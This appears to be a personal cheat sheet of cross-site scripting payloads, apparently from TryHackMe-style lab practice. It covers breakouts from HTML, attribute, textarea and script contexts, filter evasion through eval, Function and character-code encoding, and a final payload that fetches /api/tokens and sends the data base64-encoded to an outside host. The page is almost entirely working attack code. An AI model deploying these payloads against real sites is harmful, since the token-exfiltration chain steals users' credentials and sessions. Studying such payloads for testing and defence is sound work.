Skip to content

Cross-site scripting (XSS)

injection point 1

<div>
{name}
</div>
<script>alert(1)</script>
<div>
<script>alert(1)</script>
</div>

injection point 2

<h2> {name} </h2>
michal</h2><script>alert('THM')</script><h2>
<h2> michal</h2><script>alert('THM')</script><h2> </h2>

injection point 3

<input value="{name}">
michal"><script>alert('THM')</script><img id="
<input value="michal"><script>alert('THM')</script><img id="">

injection point 4

<textarea> {name} </textarea>
michal</textarea><script>alert('THM')</script><textarea>
<textarea> michal</textarea><script>alert('THM')</script><textarea> </textarea>

injection point 5

<script>
document.getElementsByClassName('name')[0].innerHTML='{name}';
</script>
michal'; alert('THM'); //
<script>
document.getElementsByClassName('name')[0].innerHTML='michal'; alert('THM'); //';
</script>

injection point 6

<h2>Hello, michal</h2>

<h2>Hello, <script>alert(1)</script></h2>
<h2>Hello, alert(1)</h2>

<h2>Hello, <scr<script>ipt>alert(1)</scr<script>ipt></h2>
<h2>Hello, <script>alert(1)</script></h2>

injection point 7

<img src="{name}">
/images/cat.jpg" onload="alert('THM')" id="

Example 1


// allowed - eval, disallowed - alert

eval('alert(`XSS`)')

eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))
// allowed - Function, disallowed - eval, alert

new Function('alert(`XSS`)')()

new Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()
// allowed - Function, disallowed - eval, alert, new

Function('alert(`XSS`)')()

Function(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()
// allowed - Function, disallowed - eval, alert, new

new Function('alert(`XSS`)')()

Function.call({}, 'alert(`XSS`)')()

Function.call({}, String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()
// allowed - Function, disallowed - eval, alert, new, {}

new Function('alert(`XSS`)')()

Function.call(this, 'alert(`XSS`)')()

Function.call(this, String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41))()

Example 2


<img src='#' onerror='alert(1)' />
<img src='#' onerror='(function(){alert(1);return false;})();return false;' />
xhttp = new XMLHttpRequest(); 
xhttp.onload = function(){alert(this.responseText)}; xhttp.open('GET','/api/tokens');  
xhttp.send();
eval(atob(".................."));
eval(atob('..................'));
eval(atob(`..................`));
<img src=0 onerror='eval(atob(`eGh0dHAgPSBuZXcgWE1MSHR0cFJlcXVlc3QoKTsgCnhodHRwLm9ubG9hZCA9IGZ1bmN0aW9uKCl7YWxlcnQodGhpcy5yZXNwb25zZVRleHQpfTsgeGh0dHAub3BlbignR0VUJywnL2FwaS90b2tlbnMnKTsgIAp4aHR0cC5zZW5kKCk7`))'/>

Example 3


a = new XMLHttpRequest(); 
a.onload = function(){
    b = new XMLHttpRequest();
    b.open('GET','//michalszalkowski.com?'+btoa(this.responseText)); 
    b.send();
}; 
a.open('GET','/api/tokens');
a.setRequestHeader('Hacker', 'Szalek');
a.send();
(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()
<img src=0 onerror='(a=new XMLHttpRequest).onload=function(){(b=new XMLHttpRequest).open(`GET`,`//michalszalkowski.com?`+btoa(this.responseText)),b.send()},a.open(`GET`,`/api/tokens`),a.setRequestHeader(`Hacker`,`Szalek`),a.send()'/>